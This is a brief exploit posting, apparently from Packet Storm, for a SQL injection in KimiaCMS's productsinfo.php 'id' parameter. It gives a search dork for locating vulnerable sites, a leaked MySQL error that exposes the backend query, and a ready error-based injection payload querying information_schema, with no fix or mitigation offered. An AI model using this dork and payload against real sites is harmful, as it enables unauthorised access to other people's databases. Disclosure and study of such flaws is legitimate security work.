KimiaCMS suffers from a remote SQL injection vulnerability.
a010599c93728ab331c9ae1230f7a84a834366c52416d1c092d54a517329d372+-------------------------------+------------------------------+
KimiaCMS ("productsinfo.php?id=") SQL Injection Vulnerability
Author: R3VAN_BASTARD (walkingdead@anotherdayanothercity.com)
HomePage: INDONESIA RAYA - JOGJA - WARUNG BOTO
+-------------------------------+------------------------------+
[X] VENDOR: http://www.kimia.co.za/
[X] DOWNLOAD: $$$
[X] Vulnerability: SQL INJECTION
[X] DORK: "Graphic design & Web design by Kimia"
+-------------------------------+------------------------------+
FILE: http://localhost/productsinfo.php?id=NULL
Error in sql statement!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
SQL = UPDATE `catalogue-product-item` SET `number-of-views` = `number-of-views` + 1 WHERE id = NULL\'
EXPLOIT: http://localhost/productsinfo.php?id=NULL AND (SELECT 1227 FROM(SELECT COUNT(*),CONCAT(CHAR(58,118,118,97,58),(SELECT (CASE WHEN (1227=1227) THEN 1 ELSE 0 END)),CHAR(58,118,113,101,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
+-------------------------------+------------------------------+
Thanks To: My Wife Listo.hurt - All my friends
+-------------------------------+------------------------------+
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed